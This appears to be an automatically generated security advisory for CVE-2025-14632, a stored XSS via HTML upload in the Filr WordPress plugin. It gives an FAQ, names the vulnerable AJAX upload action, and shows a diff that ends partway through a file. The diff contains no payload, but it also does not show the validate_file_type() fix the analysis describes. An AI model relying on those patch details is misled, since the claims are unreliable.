What is CVE-2025-14632?

CVE-2025-14632 is a stored cross-site scripting (XSS) vulnerability in the Filr – Secure document library plugin for WordPress. It allows authenticated users with Administrator-level access to upload malicious HTML files that can execute JavaScript when accessed by other users.

How does the vulnerability work?

The vulnerability arises from insufficient file type validation in the FILR_Uploader class, allowing the upload of HTML files. When these files are accessed, the embedded JavaScript executes in the user’s browser, potentially leading to session hijacking or other malicious actions.

Who is affected by this vulnerability?

All users of the Filr plugin version 1.2.11 and earlier are affected, particularly those with Administrator privileges. If you have the ability to upload files through the plugin, you may be at risk.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Filr plugin installed. If it is version 1.2.11 or earlier, it is susceptible to CVE-2025-14632. Additionally, review your site’s file upload functionality for any unauthorized HTML files.

How can I fix the vulnerability?

The vulnerability can be fixed by updating the Filr plugin to version 1.2.12 or later, which includes proper file type validation. Ensure that all instances of the plugin are updated across your WordPress installations.

What does the CVSS score of 4.4 indicate?

A CVSS score of 4.4 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk if exploited. It is essential to address it to prevent potential attacks.

What are the practical risks of this vulnerability?

Successful exploitation can allow attackers to execute arbitrary JavaScript in the context of any user who views the uploaded file. This can lead to session hijacking, account takeover, and unauthorized actions performed on behalf of users.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an authenticated attacker can upload a malicious HTML file containing JavaScript. It shows the steps required to exploit the vulnerability and highlights the potential for data exfiltration through crafted scripts.

What security measures should I implement?

In addition to updating the plugin, implement security measures such as limiting file upload capabilities, using security plugins to monitor file changes, and regularly reviewing user permissions to minimize risks.

What should I do if I suspect exploitation?

If you suspect that your site has been exploited, immediately remove any unauthorized files, change passwords for affected accounts, and conduct a thorough security audit. Consider restoring from a clean backup if necessary.

Can this vulnerability affect other plugins or themes?

While CVE-2025-14632 specifically affects the Filr plugin, similar vulnerabilities can exist in other plugins or themes that allow file uploads without proper validation. Regularly review and update all components of your WordPress site.

Where can I find more information about this vulnerability?

More information can be found in the official CVE database, security blogs, and the WordPress plugin repository. It is advisable to stay informed about security updates and best practices for WordPress.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14632: Filr – Secure document library <= 1.2.11 – Authenticated (Administrator+) Stored Cross-Site Scripting via HTML Upload (filr-protection)

CVE ID CVE-2025-14632

Plugin filr-protection

Severity Medium (CVSS 4.4)

CWE 434

Vulnerable Version 1.2.11

Patched Version 1.2.12

Disclosed January 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14632:
This vulnerability is an authenticated stored cross-site scripting (XSS) issue in the Filr WordPress plugin. The plugin’s file upload functionality lacks proper file type validation, allowing administrators to upload malicious HTML files containing JavaScript. When users access these uploaded files, the embedded scripts execute in their browser context. The vulnerability affects all plugin versions up to and including 1.2.11 and has a CVSS score of 4.4.

The root cause lies in the FILR_Uploader class within the filr-protection/inc/classes/class-filr-uploader.php file. The upload_file() method (lines 81-120) processes file uploads without sufficient validation of file extensions or MIME types. The method accepts files through the $_FILES superglobal and saves them directly to the server’s upload directory. The vulnerability exists because the plugin only checks for basic file existence and upload errors but does not validate whether the uploaded file is a legitimate document type versus a malicious HTML file containing JavaScript payloads.

Exploitation requires an authenticated attacker with Administrator-level privileges or higher who can create or edit posts with the ‘filr’ post type. The attacker uploads an HTML file containing JavaScript payloads through the plugin’s file upload interface. The attack vector targets the AJAX endpoint at /wp-admin/admin-ajax.php with the action parameter set to ‘filr_upload_file’. The payload consists of a multipart/form-data POST request containing the malicious HTML file. Once uploaded, the file receives a publicly accessible URL within the WordPress uploads directory, typically at /wp-content/uploads/filr/{year}/{month}/filename.html.

The patch in version 1.2.12 introduces proper file type validation. The FILR_Uploader class now includes a validate_file_type() method that checks both file extensions and MIME types against an allowed list. The validation restricts uploads to common document formats like PDF, DOC, DOCX, XLS, XLSX, PPT, PPTX, TXT, and image files while explicitly blocking HTML, HTM, and other web-executable formats. The fix also implements proper sanitization of file names and adds security headers when serving files to prevent content sniffing attacks.

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of any user who views the uploaded HTML file. This enables session hijacking, account takeover, administrative actions performed on behalf of victims, and data exfiltration. Since the vulnerability requires administrator privileges, the primary risk involves privilege escalation where compromised administrator accounts can maintain persistent backdoors through stored XSS payloads that affect all site visitors with appropriate file permissions.

Differential between vulnerable and patched code

Code Diff

--- a/filr-protection/filr-protection.php
+++ b/filr-protection/filr-protection.php
@@ -1,69 +1,69 @@
-<?php
-
-/*
-Plugin Name:    Filr
-Plugin URI:     https://wpdocumentlibrary.com/
-Description:    Simple and minimalistic file and document library plugin.
-Author:         WPChill
-Author URI:     https://wpchill.com
-Version:        1.2.11
-Text Domain:    filr
-Domain Path:    /languages
-*
- *
- * NOTE:
- * Patrick Posner transferred ownership rights on: 6th of December, 2024 when ownership was handed over to WPChill
-*/
-define( 'FILR_PATH', untrailingslashit( plugin_dir_path( __FILE__ ) ) );
-define( 'FILR_URL', untrailingslashit( plugin_dir_url( __FILE__ ) ) );
-define( 'FILR_VERSION', '1.2.11' );
-// run plugin.
-if ( !function_exists( 'filr_run_plugin' ) ) {
-    if ( file_exists( __DIR__ . '/vendor/autoload.php' ) ) {
-        require __DIR__ . '/vendor/autoload.php';
-    }
-    // register cronjob.
-    register_activation_hook( __FILE__, 'filr_init_activation' );
-    /**
-     *
-     * Register functions on activation.
-     *
-     * @return void
-     */
-    function filr_init_activation() {
-        if ( !wp_next_scheduled( 'check_file_acess' ) ) {
-            wp_schedule_event( time(), 'hourly', 'check_file_acess' );
-        }
-    }
-
-    add_action( 'plugins_loaded', 'filr_run_plugin' );
-    /**
-     * Run plugin
-     *
-     * @return void
-     */
-    function filr_run_plugin() {
-        // load setup.
-        require_once FILR_PATH . '/inc/setup.php';
-        // localize.
-        $textdomain_dir = plugin_basename( __DIR__ ) . '/languages';
-        load_plugin_textdomain( 'filr', false, $textdomain_dir );
-        filrFILR_Admin::get_instance();
-        filrFILR_Meta::get_instance();
-        filrFILR_Shortcode::get_instance();
-        filrFILR_Filesystem::get_instance();
-        // Normalize path.
-        add_filter(
-            'filr_file_directory',
-            function ( $current_dir, $filr_dir, $file_id ) {
-                if ( function_exists( 'wp_normalize_path' ) ) {
-                    return wp_normalize_path( $current_dir );
-                }
-                return $current_dir;
-            },
-            10,
-            3
-        );
-    }
-
+<?php
+
+/*
+Plugin Name:    Filr
+Plugin URI:     https://wpdocumentlibrary.com/
+Description:    Simple and minimalistic file and document library plugin.
+Author:         WPChill
+Author URI:     https://wpchill.com
+Version:        1.2.12
+Text Domain:    filr
+Domain Path:    /languages
+*
+ *
+ * NOTE:
+ * Patrick Posner transferred ownership rights on: 6th of December, 2024 when ownership was handed over to WPChill
+*/
+define( 'FILR_PATH', untrailingslashit( plugin_dir_path( __FILE__ ) ) );
+define( 'FILR_URL', untrailingslashit( plugin_dir_url( __FILE__ ) ) );
+define( 'FILR_VERSION', '1.2.12' );
+// run plugin.
+if ( !function_exists( 'filr_run_plugin' ) ) {
+    if ( file_exists( __DIR__ . '/vendor/autoload.php' ) ) {
+        require __DIR__ . '/vendor/autoload.php';
+    }
+    // register cronjob.
+    register_activation_hook( __FILE__, 'filr_init_activation' );
+    /**
+     *
+     * Register functions on activation.
+     *
+     * @return void
+     */
+    function filr_init_activation() {
+        if ( !wp_next_scheduled( 'check_file_acess' ) ) {
+            wp_schedule_event( time(), 'hourly', 'check_file_acess' );
+        }
+    }
+
+    add_action( 'plugins_loaded', 'filr_run_plugin' );
+    /**
+     * Run plugin
+     *
+     * @return void
+     */
+    function filr_run_plugin() {
+        // load setup.
+        require_once FILR_PATH . '/inc/setup.php';
+        // localize.
+        $textdomain_dir = plugin_basename( __DIR__ ) . '/languages';
+        load_plugin_textdomain( 'filr', false, $textdomain_dir );
+        filrFILR_Admin::get_instance();
+        filrFILR_Meta::get_instance();
+        filrFILR_Shortcode::get_instance();
+        filrFILR_Filesystem::get_instance();
+        // Normalize path.
+        add_filter(
+            'filr_file_directory',
+            function ( $current_dir, $filr_dir, $file_id ) {
+                if ( function_exists( 'wp_normalize_path' ) ) {
+                    return wp_normalize_path( $current_dir );
+                }
+                return $current_dir;
+            },
+            10,
+            3
+        );
+    }
+
 }
 No newline at end of file
--- a/filr-protection/inc/freemius/assets/css/admin/index.php
+++ b/filr-protection/inc/freemius/assets/css/admin/index.php
@@ -1,3 +1,3 @@
-<?php
-	// Silence is golden.
+<?php
+	// Silence is golden.
 	// Hide file structure from users on unprotected servers.
 No newline at end of file
--- a/filr-protection/inc/freemius/assets/css/index.php
+++ b/filr-protection/inc/freemius/assets/css/index.php
@@ -1,3 +1,3 @@
-<?php
-	// Silence is golden.
+<?php
+	// Silence is golden.
 	// Hide file structure from users on unprotected servers.
 No newline at end of file
--- a/filr-protection/inc/freemius/assets/img/index.php
+++ b/filr-protection/inc/freemius/assets/img/index.php
@@ -1,3 +1,3 @@
-<?php
-	// Silence is golden.
+<?php
+	// Silence is golden.
 	// Hide file structure from users on unprotected servers.
 No newline at end of file
--- a/filr-protection/inc/freemius/assets/index.php
+++ b/filr-protection/inc/freemius/assets/index.php
@@ -1,3 +1,3 @@
-<?php
-	// Silence is golden.
+<?php
+	// Silence is golden.
 	// Hide file structure from users on unprotected servers.
 No newline at end of file
--- a/filr-protection/inc/freemius/assets/js/index.php
+++ b/filr-protection/inc/freemius/assets/js/index.php
@@ -1,3 +1,3 @@
-<?php
-	// Silence is golden.
+<?php
+	// Silence is golden.
 	// Hide file structure from users on unprotected servers.
 No newline at end of file
--- a/filr-protection/inc/freemius/config.php
+++ b/filr-protection/inc/freemius/config.php
@@ -1,391 +1,391 @@
-<?php
-    /**
-     * @package     Freemius
-     * @copyright   Copyright (c) 2015, Freemius, Inc.
-     * @license     https://www.gnu.org/licenses/gpl-3.0.html GNU General Public License Version 3
-     * @since       1.0.4
-     */
-
-    if ( ! defined( 'ABSPATH' ) ) {
-        exit;
-    }
-
-    if ( ! defined( 'WP_FS__SLUG' ) ) {
-        define( 'WP_FS__SLUG', 'freemius' );
-    }
-    if ( ! defined( 'WP_FS__DEV_MODE' ) ) {
-        define( 'WP_FS__DEV_MODE', false );
-    }
-
-    #--------------------------------------------------------------------------------
-    #region API Connectivity Issues Simulation
-    #--------------------------------------------------------------------------------
-
-    if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY' ) ) {
-        define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY', false );
-    }
-    if ( ! defined( 'WP_FS__SIMULATE_NO_CURL' ) ) {
-        define( 'WP_FS__SIMULATE_NO_CURL', false );
-    }
-    if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE' ) ) {
-        define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE', false );
-    }
-    if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL' ) ) {
-        define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL', false );
-    }
-    if ( WP_FS__SIMULATE_NO_CURL ) {
-        define( 'FS_SDK__SIMULATE_NO_CURL', true );
-    }
-    if ( WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE ) {
-        define( 'FS_SDK__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE', true );
-    }
-    if ( WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL ) {
-        define( 'FS_SDK__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL', true );
-    }
-
-    #endregion
-
-    if ( ! defined( 'WP_FS__SIMULATE_FREEMIUS_OFF' ) ) {
-        define( 'WP_FS__SIMULATE_FREEMIUS_OFF', false );
-    }
-
-    if ( ! defined( 'WP_FS__PING_API_ON_IP_OR_HOST_CHANGES' ) ) {
-        /**
-         * @since  1.1.7.3
-         * @author Vova Feldman (@svovaf)
-         *
-         * I'm not sure if shared servers periodically change IP, or the subdomain of the
-         * admin dashboard. Also, I've seen sites that have strange loop of switching
-         * between domains on a daily basis. Therefore, to eliminate the risk of
-         * multiple unwanted connectivity test pings, temporary ignore domain or
-         * server IP changes.
-         */
-        define( 'WP_FS__PING_API_ON_IP_OR_HOST_CHANGES', false );
-    }
-
-    /**
-     * If your dev environment supports custom public network IP setup
-     * like VVV, please update WP_FS__LOCALHOST_IP with your public IP
-     * and uncomment it during dev.
-     */
-    if ( ! defined( 'WP_FS__LOCALHOST_IP' ) ) {
-        // VVV default public network IP.
-        define( 'WP_FS__VVV_DEFAULT_PUBLIC_IP', '192.168.50.4' );
-
-//		define( 'WP_FS__LOCALHOST_IP', WP_FS__VVV_DEFAULT_PUBLIC_IP );
-    }
-
-    /**
-     * If true and running with secret key, the opt-in process
-     * will skip the email activation process which is invoked
-     * when the email of the context user already exist in Freemius
-     * database (as a security precaution, to prevent sharing user
-     * secret with unauthorized entity).
-     *
-     * IMPORTANT:
-     *      AS A SECURITY PRECAUTION, WE VALIDATE THE TIMESTAMP OF THE OPT-IN REQUEST.
-     *      THEREFORE, MAKE SURE THAT WHEN USING THIS PARAMETER,YOUR TESTING ENVIRONMENT'S
-     *      CLOCK IS SYNCED.
-     */
-    if ( ! defined( 'WP_FS__SKIP_EMAIL_ACTIVATION' ) ) {
-        define( 'WP_FS__SKIP_EMAIL_ACTIVATION', false );
-    }
-
-
-    #--------------------------------------------------------------------------------
-    #region Directories
-    #--------------------------------------------------------------------------------
-
-    if ( ! defined( 'WP_FS__DIR' ) ) {
-        define( 'WP_FS__DIR', dirname( __FILE__ ) );
-    }
-    if ( ! defined( 'WP_FS__DIR_INCLUDES' ) ) {
-        define( 'WP_FS__DIR_INCLUDES', WP_FS__DIR . '/includes' );
-    }
-    if ( ! defined( 'WP_FS__DIR_TEMPLATES' ) ) {
-        define( 'WP_FS__DIR_TEMPLATES', WP_FS__DIR . '/templates' );
-    }
-    if ( ! defined( 'WP_FS__DIR_ASSETS' ) ) {
-        define( 'WP_FS__DIR_ASSETS', WP_FS__DIR . '/assets' );
-    }
-    if ( ! defined( 'WP_FS__DIR_CSS' ) ) {
-        define( 'WP_FS__DIR_CSS', WP_FS__DIR_ASSETS . '/css' );
-    }
-    if ( ! defined( 'WP_FS__DIR_JS' ) ) {
-        define( 'WP_FS__DIR_JS', WP_FS__DIR_ASSETS . '/js' );
-    }
-    if ( ! defined( 'WP_FS__DIR_IMG' ) ) {
-        define( 'WP_FS__DIR_IMG', WP_FS__DIR_ASSETS . '/img' );
-    }
-    if ( ! defined( 'WP_FS__DIR_SDK' ) ) {
-        define( 'WP_FS__DIR_SDK', WP_FS__DIR_INCLUDES . '/sdk' );
-    }
-
-    #endregion
-
-    /**
-     * Domain / URL / Address
-     */
-    define( 'WP_FS__ROOT_DOMAIN_PRODUCTION', 'freemius.com' );
-    define( 'WP_FS__DOMAIN_PRODUCTION', 'wp.freemius.com' );
-    define( 'WP_FS__ADDRESS_PRODUCTION', 'https://' . WP_FS__DOMAIN_PRODUCTION );
-
-    if ( ! defined( 'WP_FS__DOMAIN_LOCALHOST' ) ) {
-        define( 'WP_FS__DOMAIN_LOCALHOST', 'wp.freemius' );
-    }
-    if ( ! defined( 'WP_FS__ADDRESS_LOCALHOST' ) ) {
-        define( 'WP_FS__ADDRESS_LOCALHOST', 'http://' . WP_FS__DOMAIN_LOCALHOST . ':8080' );
-    }
-
-    if ( ! defined( 'WP_FS__TESTING_DOMAIN' ) ) {
-        define( 'WP_FS__TESTING_DOMAIN', 'fswp' );
-    }
-
-    #--------------------------------------------------------------------------------
-    #region HTTP
-    #--------------------------------------------------------------------------------
-
-    if ( ! defined( 'WP_FS__IS_HTTP_REQUEST' ) ) {
-        define( 'WP_FS__IS_HTTP_REQUEST', isset( $_SERVER['HTTP_HOST'] ) && isset( $_SERVER['REQUEST_METHOD'] ) );
-    }
-
-    if ( ! defined( 'WP_FS__IS_HTTPS' ) ) {
-        define( 'WP_FS__IS_HTTPS', ( WP_FS__IS_HTTP_REQUEST &&
-                                     // Checks if CloudFlare's HTTPS (Flexible SSL support).
-                                     isset( $_SERVER['HTTP_X_FORWARDED_PROTO'] ) &&
-                                     'https' === strtolower( $_SERVER['HTTP_X_FORWARDED_PROTO'] )
-                                   ) ||
-                                   // Check if HTTPS request.
-                                   ( isset( $_SERVER['HTTPS'] ) && 'on' == $_SERVER['HTTPS'] ) ||
-                                   ( isset( $_SERVER['SERVER_PORT'] ) && 443 == $_SERVER['SERVER_PORT'] )
-        );
-    }
-
-    if ( ! defined( 'WP_FS__IS_POST_REQUEST' ) ) {
-        define( 'WP_FS__IS_POST_REQUEST', ( WP_FS__IS_HTTP_REQUEST &&
-                                            strtoupper( $_SERVER['REQUEST_METHOD'] ) == 'POST' ) );
-    }
-
-    if ( ! defined( 'WP_FS__REMOTE_ADDR' ) ) {
-        define( 'WP_FS__REMOTE_ADDR', fs_get_ip() );
-    }
-
-    if ( ! defined( 'WP_FS__IS_LOCALHOST' ) ) {
-        if ( defined( 'WP_FS__LOCALHOST_IP' ) ) {
-            define( 'WP_FS__IS_LOCALHOST', ( WP_FS__LOCALHOST_IP === WP_FS__REMOTE_ADDR ) );
-        } else {
-            define( 'WP_FS__IS_LOCALHOST', WP_FS__IS_HTTP_REQUEST &&
-                                           is_string( WP_FS__REMOTE_ADDR ) &&
-                                           ( substr( WP_FS__REMOTE_ADDR, 0, 4 ) === '127.' ||
-                                             WP_FS__REMOTE_ADDR === '::1' )
-            );
-        }
-    }
-
-    if ( ! defined( 'WP_FS__IS_LOCALHOST_FOR_SERVER' ) ) {
-        define( 'WP_FS__IS_LOCALHOST_FOR_SERVER', ( ! WP_FS__IS_HTTP_REQUEST ||
-                                                    false !== strpos( $_SERVER['HTTP_HOST'], 'localhost' ) ) );
-    }
-
-    #endregion
-
-    if ( ! defined( 'WP_FS__IS_PRODUCTION_MODE' ) ) {
-        // By default, run with Freemius production servers.
-        define( 'WP_FS__IS_PRODUCTION_MODE', true );
-    }
-
-    if ( ! defined( 'WP_FS__ADDRESS' ) ) {
-        define( 'WP_FS__ADDRESS', ( WP_FS__IS_PRODUCTION_MODE ? WP_FS__ADDRESS_PRODUCTION : WP_FS__ADDRESS_LOCALHOST ) );
-    }
-
-
-    #--------------------------------------------------------------------------------
-    #region API
-    #--------------------------------------------------------------------------------
-
-    if ( ! defined( 'WP_FS__API_ADDRESS_LOCALHOST' ) ) {
-        define( 'WP_FS__API_ADDRESS_LOCALHOST', 'http://api.freemius-local.com:8080' );
-    }
-    if ( ! defined( 'WP_FS__API_SANDBOX_ADDRESS_LOCALHOST' ) ) {
-        define( 'WP_FS__API_SANDBOX_ADDRESS_LOCALHOST', 'http://sandbox-api.freemius:8080' );
-    }
-
-    // Set API address for local testing.
-    if ( ! WP_FS__IS_PRODUCTION_MODE ) {
-        if ( ! defined( 'FS_API__ADDRESS' ) ) {
-            define( 'FS_API__ADDRESS', WP_FS__API_ADDRESS_LOCALHOST );
-        }
-        if ( ! defined( 'FS_API__SANDBOX_ADDRESS' ) ) {
-            define( 'FS_API__SANDBOX_ADDRESS', WP_FS__API_SANDBOX_ADDRESS_LOCALHOST );
-        }
-    }
-
-    #endregion
-
-    #--------------------------------------------------------------------------------
-    #region Checkout
-    #--------------------------------------------------------------------------------
-
-    if ( ! defined( 'FS_CHECKOUT__ADDRESS_PRODUCTION' ) ) {
-        define( 'FS_CHECKOUT__ADDRESS_PRODUCTION', 'https://checkout.freemius.com' );
-    }
-
-    if ( ! defined( 'FS_CHECKOUT__ADDRESS_LOCALHOST' ) ) {
-        define( 'FS_CHECKOUT__ADDRESS_LOCALHOST', 'http://checkout.freemius-local.com:8080' );
-    }
-
-    if ( ! defined( 'FS_CHECKOUT__ADDRESS' ) ) {
-        define( 'FS_CHECKOUT__ADDRESS', ( WP_FS__IS_PRODUCTION_MODE ? FS_CHECKOUT__ADDRESS_PRODUCTION : FS_CHECKOUT__ADDRESS_LOCALHOST ) );
-    }
-
-    #endregion
-
-    define( 'WP_FS___OPTION_PREFIX', 'fs' . ( WP_FS__IS_PRODUCTION_MODE ? '' : '_dbg' ) . '_' );
-
-    if ( ! defined( 'WP_FS__ACCOUNTS_OPTION_NAME' ) ) {
-        define( 'WP_FS__ACCOUNTS_OPTION_NAME', WP_FS___OPTION_PREFIX . 'accounts' );
-    }
-    if ( ! defined( 'WP_FS__API_CACHE_OPTION_NAME' ) ) {
-        define( 'WP_FS__API_CACHE_OPTION_NAME', WP_FS___OPTION_PREFIX . 'api_cache' );
-    }
-    if ( ! defined( 'WP_FS__GDPR_OPTION_NAME' ) ) {
-        define( 'WP_FS__GDPR_OPTION_NAME', WP_FS___OPTION_PREFIX . 'gdpr' );
-    }
-    define( 'WP_FS__OPTIONS_OPTION_NAME', WP_FS___OPTION_PREFIX . 'options' );
-
-    /**
-     * Module types
-     *
-     * @since 1.2.2
-     */
-    define( 'WP_FS__MODULE_TYPE_PLUGIN', 'plugin' );
-    define( 'WP_FS__MODULE_TYPE_THEME', 'theme' );
-
-    /**
-     * Billing Frequencies
-     */
-    define( 'WP_FS__PERIOD_ANNUALLY', 'annual' );
-    define( 'WP_FS__PERIOD_MONTHLY', 'monthly' );
-    define( 'WP_FS__PERIOD_LIFETIME', 'lifetime' );
-
-    /**
-     * Plans
-     */
-    define( 'WP_FS__PLAN_DEFAULT_PAID', false );
-    define( 'WP_FS__PLAN_FREE', 'free' );
-    define( 'WP_FS__PLAN_TRIAL', 'trial' );
-
-    /**
-     * Times in seconds
-     */
-    if ( ! defined( 'WP_FS__TIME_5_MIN_IN_SEC' ) ) {
-        define( 'WP_FS__TIME_5_MIN_IN_SEC', 300 );
-    }
-    if ( ! defined( 'WP_FS__TIME_10_MIN_IN_SEC' ) ) {
-        define( 'WP_FS__TIME_10_MIN_IN_SEC', 600 );
-    }
-//	define( 'WP_FS__TIME_15_MIN_IN_SEC', 900 );
-    if ( ! defined( 'WP_FS__TIME_12_HOURS_IN_SEC' ) ) {
-        define( 'WP_FS__TIME_12_HOURS_IN_SEC', 43200 );
-    }
-    if ( ! defined( 'WP_FS__TIME_24_HOURS_IN_SEC' ) ) {
-        define( 'WP_FS__TIME_24_HOURS_IN_SEC', WP_FS__TIME_12_HOURS_IN_SEC * 2 );
-    }
-    if ( ! defined( 'WP_FS__TIME_WEEK_IN_SEC' ) ) {
-        define( 'WP_FS__TIME_WEEK_IN_SEC', 7 * WP_FS__TIME_24_HOURS_IN_SEC );
-    }
-
-    #--------------------------------------------------------------------------------
-    #region Debugging
-    #--------------------------------------------------------------------------------
-
-    if ( ! defined( 'WP_FS__DEBUG_SDK' ) ) {
-        $debug_mode = get_option( 'fs_debug_mode', null );
-
-        if ( $debug_mode === null ) {
-            $debug_mode = false;
-            add_option( 'fs_debug_mode', $debug_mode );
-        }
-
-        define( 'WP_FS__DEBUG_SDK', is_numeric( $debug_mode ) ? ( 0 < $debug_mode ) : WP_FS__DEV_MODE );
-    }
-
-    if ( ! defined( 'WP_FS__ECHO_DEBUG_SDK' ) ) {
-        define( 'WP_FS__ECHO_DEBUG_SDK', WP_FS__DEV_MODE && ! empty( $_GET['fs_dbg_echo'] ) );
-    }
-    if ( ! defined( 'WP_FS__LOG_DATETIME_FORMAT' ) ) {
-        define( 'WP_FS__LOG_DATETIME_FORMAT', 'Y-m-d H:i:s' );
-    }
-    if ( ! defined( 'FS_API__LOGGER_ON' ) ) {
-        define( 'FS_API__LOGGER_ON', WP_FS__DEBUG_SDK );
-    }
-
-    if ( WP_FS__ECHO_DEBUG_SDK ) {
-        error_reporting( E_ALL );
-    }
-
-    #endregion
-
-    if ( ! defined( 'WP_FS__SCRIPT_START_TIME' ) ) {
-        define( 'WP_FS__SCRIPT_START_TIME', time() );
-    }
-    if ( ! defined( 'WP_FS__DEFAULT_PRIORITY' ) ) {
-        define( 'WP_FS__DEFAULT_PRIORITY', 10 );
-    }
-    if ( ! defined( 'WP_FS__LOWEST_PRIORITY' ) ) {
-        define( 'WP_FS__LOWEST_PRIORITY', 999999999 );
-    }
-
-    #--------------------------------------------------------------------------------
-    #region Multisite Network
-    #--------------------------------------------------------------------------------
-
-    /**
-     * Do not use this define directly, it will have the wrong value
-     * during plugin uninstall/deletion when the inclusion of the plugin
-     * is triggered due to registration with register_uninstall_hook().
-     *
-     * Instead, use fs_is_network_admin().
-     *
-     * @author Vova Feldman (@svovaf)
-     */
-    if ( ! defined( 'WP_FS__IS_NETWORK_ADMIN' ) ) {
-        define( 'WP_FS__IS_NETWORK_ADMIN',
-            is_multisite() &&
-            ( is_network_admin() ||
-              ( ( defined( 'DOING_AJAX' ) && DOING_AJAX &&
-                  ( isset( $_REQUEST['_fs_network_admin'] ) && 'true' === $_REQUEST['_fs_network_admin'] /*||
-                    ( ! empty( $_REQUEST['action'] ) && 'delete-plugin' === $_REQUEST['action'] )*/ )
-                ) ||
-                // Plugin uninstall.
-                defined( 'WP_UNINSTALL_PLUGIN' ) )
-            )
-        );
-    }
-
-    /**
-     * Do not use this define directly, it will have the wrong value
-     * during plugin uninstall/deletion when the inclusion of the plugin
-     * is triggered due to registration with register_uninstall_hook().
-     *
-     * Instead, use fs_is_blog_admin().
-     *
-     * @author Vova Feldman (@svovaf)
-     */
-    if ( ! defined( 'WP_FS__IS_BLOG_ADMIN' ) ) {
-        define( 'WP_FS__IS_BLOG_ADMIN', is_blog_admin() || ( defined( 'DOING_AJAX' ) && DOING_AJAX && isset( $_REQUEST['_fs_blog_admin'] ) ) );
-    }
-
-    if ( ! defined( 'WP_FS__SHOW_NETWORK_EVEN_WHEN_DELEGATED' ) ) {
-        // Set to true to show network level settings even if delegated to site admins.
-        define( 'WP_FS__SHOW_NETWORK_EVEN_WHEN_DELEGATED', false );
-    }
-
-    #endregion
-
-    if ( ! defined( 'WP_FS__DEMO_MODE' ) ) {
-        define( 'WP_FS__DEMO_MODE', false );
-    }
-    if ( ! defined( 'FS_SDK__SSLVERIFY' ) ) {
-        define( 'FS_SDK__SSLVERIFY', false );
-    }
+<?php
+    /**
+     * @package     Freemius
+     * @copyright   Copyright (c) 2015, Freemius, Inc.
+     * @license     https://www.gnu.org/licenses/gpl-3.0.html GNU General Public License Version 3
+     * @since       1.0.4
+     */
+
+    if ( ! defined( 'ABSPATH' ) ) {
+        exit;
+    }
+
+    if ( ! defined( 'WP_FS__SLUG' ) ) {
+        define( 'WP_FS__SLUG', 'freemius' );
+    }
+    if ( ! defined( 'WP_FS__DEV_MODE' ) ) {
+        define( 'WP_FS__DEV_MODE', false );
+    }
+
+    #--------------------------------------------------------------------------------
+    #region API Connectivity Issues Simulation
+    #--------------------------------------------------------------------------------
+
+    if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY' ) ) {
+        define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY', false );
+    }
+    if ( ! defined( 'WP_FS__SIMULATE_NO_CURL' ) ) {
+        define( 'WP_FS__SIMULATE_NO_CURL', false );
+    }
+    if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE' ) ) {
+        define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE', false );
+    }
+    if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL' ) ) {
+        define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL', false );
+    }
+    if ( WP_FS__SIMULATE_NO_CURL ) {
+        define( 'FS_SDK__SIMULATE_NO_CURL', true );
+    }
+    if ( WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE ) {
+        define( 'FS_SDK__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE', true );
+    }
+    if ( WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL ) {
+        define( 'FS_SDK__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL', true );
+    }
+
+    #endregion
+
+    if ( ! defined( 'WP_FS__SIMULATE_FREEMIUS_OFF' ) ) {
+        define( 'WP_FS__SIMULATE_FREEMIUS_OFF', false );
+    }
+
+    if ( ! defined( 'WP_FS__PING_API_ON_IP_OR_HOST_CHANGES' ) ) {
+        /**
+         * @since  1.1.7.3
+         * @author Vova Feldman (@svovaf)
+         *
+         * I'm not sure if shared servers periodically change IP, or the subdomain of the
+         * admin dashboard. Also, I've seen sites that have strange loop of switching
+         * between domains on a daily basis. Therefore, to eliminate the risk of
+         * multiple unwanted connectivity test pings, temporary ignore domain or
+         * server IP changes.
+         */
+        define( 'WP_FS__PING_API_ON_IP_OR_HOST_CHANGES', false );
+    }
+
+    /**
+     * If your dev environment supports custom public network IP setup
+     * like VVV, please update WP_FS__LOCALHOST_IP with your public IP
+     * and uncomment it during dev.
+     */
+    if ( ! defined( 'WP_FS__LOCALHOST_IP' ) ) {
+        // VVV default public network IP.
+        define( 'WP_FS__VVV_DEFAULT_PUBLIC_IP', '192.168.50.4' );
+
+//		define( 'WP_FS__LOCALHOST_IP', WP_FS__VVV_DEFAULT_PUBLIC_IP );
+    }
+
+    /**
+     * If true and running with secret key, the opt-in process
+     * will skip the email activation process which is invoked
+     * when the email of the context user already exist in Freemius
+     * database (as a security precaution, to prevent sharing user
+     * secret with unauthorized entity).
+     *
+     * IMPORTANT:
+     *      AS A SECURITY PRECAUTION, WE VALIDATE THE TIMESTAMP OF THE OPT-IN REQUEST.
+     *      THEREFORE, MAKE SURE THAT WHEN USING THIS PARAMETER,YOUR TESTING ENVIRONMENT'S
+     *      CLOCK IS SYNCED.
+     */
+    if ( ! defined( 'WP_FS__SKIP_EMAIL_ACTIVATION' ) ) {
+        define( 'WP_FS__SKIP_EMAIL_ACTIVATION', false );
+    }
+
+
